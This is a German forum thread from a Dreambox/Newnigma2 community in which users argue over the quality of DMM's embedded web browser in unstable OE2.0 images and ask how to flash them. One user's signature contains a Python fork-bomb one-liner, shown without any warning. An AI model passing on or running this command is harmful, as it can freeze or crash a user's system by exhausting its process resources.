Feedback/Bugs in unstable images DM8000/DM7020HD/DM800se/DM800/DM500HD OE2.0

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Lass doch den Browser noch etwas reifen, DMM wird den sicherlich weiterentwickeln und dann wird der besser funzen als dein Browser. Ich finde ihn schon ganz in Ordnung, noch etwas mehr Speed dann passt das.
  • Original von Matty06
    Lass doch den Browser noch etwas reifen, DMM wird den sicherlich weiterentwickeln und dann wird der besser funzen als dein Browser. Ich finde ihn schon ganz in Ordnung, noch etwas mehr Speed dann passt das.

    Einen Browser, der nicht funktioniert soll ich "reifen lassen",
    aber an einen funktionierenden darf ich nicht mehr benutzen!?!

    P.S.: Sägt DMM immer mehr an dem Ast, auf dem sie sitzen?
    Gruß Èowyn
  • Hi,
    @deepblue2000 läuft halt nicht Alles Feed und so lief und mom habe mich 5 Std mit dem unstable rumgeschlagen, aber liegt net an NN² sondern an E2, ich warte und es kommt die Zeit wo ich umsteigen werde!!! :rolleyes:
    Nicht das Internet macht wahnsinnig, sondern die Wahnsinnigen machen das Internet!!
    Gruß goetzy200!! :denk:

    DM7020HDss, DM800sec, DM500HD-s, Tastatur Logitech K400r, iMac 21.5, MacBook, Lappi Debian Squeeze, iPhone 5, iPadmini, iPad3, PS3, Sat 13+19.2, Buffalo NAS 1TB


  • Original von wernerr
    Kann ich nicht verstehen. Der Browser läuft doch. Tip: Falls du die Startseite meinst, die kann man auch verändern. :D

    Ich meine diesen:
    Bilder
    • qtwebbrowser.jpg

      142,79 kB, 663×542, 6.441 mal angesehen
    Gruß Èowyn
  • Hallo

    Ich habe mal eine Frage: Soll ich das Image über den Browser flashen oder kann ich das auch mit dflash machen?
    Gruß Rabevater

    Dreambox HD8000ss
    Newnigma2 aktuelles unstable OE2.0 alpha
    Skin dreamTV-HD
  • @ Èowyn

    Hier versteht dich kein Mensch ..
    Geht nicht ist keine Fehlerbeschreibung - was genau geht denn nicht am Browser ??
    Bilder
    • browser.jpg

      169,3 kB, 1.170×706, 6.204 mal angesehen
  • Original von Teddy
    Original von Rabevater
    Hallo

    Ich habe mal eine Frage: Soll ich das Image über den Browser flashen oder kann ich das auch mit dflash machen?


    Mach es mit dem Browser.


    Habe ich inzwischen getan und mal meine Settings eingespielt. Klappte soweit alles ganz gut aber es ist noch ein weiter Weg bis zum fertigen Image.
    NN2 1.6 bleibt erst mal meine Nr1. :] ;)
    Gruß Rabevater

    Dreambox HD8000ss
    Newnigma2 aktuelles unstable OE2.0 alpha
    Skin dreamTV-HD

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Rabevater ()

  • Original von sparksofinsanity
    @ Èowyn
    Hier versteht dich kein Mensch ..

    Ich habe doch oben ein Bild vom "richtigen" Qt-Browser gepostet.
    Den gab`s mal ein paar Tage im GP 3.2.

    Bei dem Web-Browser von DMM geht ja nicht mal meine Funk-Tastatur richtig!
    Soll ich da etwa jede URL komplett eingeben, oder gibt es da auch Lesezeichen?

    Müssen wir hier wirklich darüber diskutieren, was ein brauchbarer Web-Browser ist und was nur Krampf von DMM?

    Ich dachte immer NN2 ist nicht so von DMM abhängig und schaut auch mal über den Tellerrand . . .
    Gruß Èowyn
  • Soll ich da etwa jede URL komplett eingeben, oder gibt es da auch Lesezeichen?


    Da sieht man mal wie du getestet hast :rolleyes:

    Wenn er dir nicht gefällt dann nimm ihn halt nicht und geh woanders trollen.

    Übrigens ist das ein embedded System - wenn du ein richtigen Browser willst dann geh an den PC.
    Auch der QT Browser von emanuel kann ein richtigen Browser nicht ersetzen.

    Von der Prozessor-Geschwindigkeit und dem Seitenaufbau ganz zu schweigen ..
  • Original von sparksofinsanity
    Soll ich da etwa jede URL komplett eingeben, oder gibt es da auch Lesezeichen?


    Da sieht man mal wie du getestet hast :rolleyes:

    Wenn er dir nicht gefällt dann nimm ihn halt nicht und geh woanders trollen.

    Übrigens ist das ein embedded System - wenn du ein richtigen Browser willst dann geh an den PC.
    Auch der QT Browser von emanuel kann ein richtigen Browser nicht ersetzen.

    Von der Prozessor-Geschwindigkeit und dem Seitenaufbau ganz zu schweigen ..


    da kann ich dir nur voll und ganz zustimmen sparky ;) man merkt das es leute gibt, die meinen ........... naja besser ich schreibe es nicht aus. Ich bin froh NN zu haben und es läuft auf ALLLEN boxen von mir :)
  • Ich hoffe, daß der browser und hbbtv im finalen nn2 4.0 optional nachinstallierbar sind und nicht von vorn herein Bestandteil des Images sind.
    Einen Speicherfressenden, langsamen browser wo man 10 Minuten braucht um mit der Fernbedienung ne URL reinzuklappern brauchen nur Masochisten.

    Wer den mal zum Spaß ausprobieren möchte, kann sich den ja auch nachladen und/oder sein Image platzen lassen.

    PS: "zum Spaß masochistische Sachen ausprobieren" ??? Was schreibe ich eigentlich für lustige Sachen? Ich glaub' ich muss ins Bett. :)
    N8
    OScam Wiki | OScam Documentation | Build your own OScam with simplebuild
    Better a 'found' without entitlements than a 'not found' with valid entitlements.
  • Originally posted by Bit
    Ich hoffe, daß der browser und hbbtv im finalen nn2 4.0 optional nachinstallierbar sind und nicht von vorn herein Bestandteil des Images sind.
    Einen Speicherfressenden, langsamen browser wo man 10 Minuten braucht um mit der Fernbedienung ne URL reinzuklappern brauchen nur Masochisten.

    Wer den mal zum Spaß ausprobieren möchte, kann sich den ja auch nachladen und/oder sein Image platzen lassen.

    PS: "zum Spaß masochistische Sachen ausprobieren" ??? Was schreibe ich eigentlich für lustige Sachen? Ich glaub' ich muss ins Bett. :)
    N8

    Das hoffe ich auch
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Wer den mal zum Spaß ausprobieren möchte, kann sich den ja auch nachladen und/oder sein Image platzen lassen.


    Die Diskussion ist meiner Ansicht nach völlig daneben.
    Es sollte sich doch auch inzwischen herrumgesprochen haben bezogen auf die "kleinen" Boxen, das installieren von Webbrowser+HbbTV ohne eine Flasherweiterung keinen Sinn macht. Da beides bereits auf dem Feed liegt verstehe diese Aufregung nicht! :D
    ----------------------------------
    PS: "zum Spaß masochistische Sachen ausprobieren" ???


    Das kann ich dir bestätigen.Ist wohl schon so seid dem es Dreamboxen gibt! =)
  • Original von sparksofinsanity
    . . .
    Wenn er dir nicht gefällt dann nimm ihn halt nicht und geh woanders trollen.

    Übrigens ist das ein embedded System - wenn du ein richtigen Browser willst dann geh an den PC.
    Auch der QT Browser von emanuel kann ein richtigen Browser nicht ersetzen.
    . . .


    Der Qt-Browser von emanuel ist ein richtiger Browser und er hat mir stundenlang viel Freude beim Surfen am TV gemacht!
    Gruß Èowyn

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Èowyn ()

  • finde deine trollerei etwas fehl am platz

    der qt-browser wurde eingestellt, weil dmm seine eigene suppe kocht und das rad ein 2. mal erfunden hat - das dann sogar noch nicht mal rund läuft. Soweit ich weiß, bedarf es nicht mal viel anpassungen im dmm-browser um ihn performanter zu machen. aber da der dmm-browser cloesed source ist kann man nichts dran änder. Und 2 Browser auf der Box macht auch keinen Sinn

    mit nn2 hat das eigentlich gar nicht zu tun ...
    Gruß Fred

    Die Dreambox ist tot, es lebe die Dreambox

    ¯\_(ツ)_/¯

    Quellcode

    1. root@dm920:~$ mount | grep "/ "
    2. /dev/mmcblk1p1 on / type ext4 (rw,relatime,data=ordered)
    3. root@dm920:~$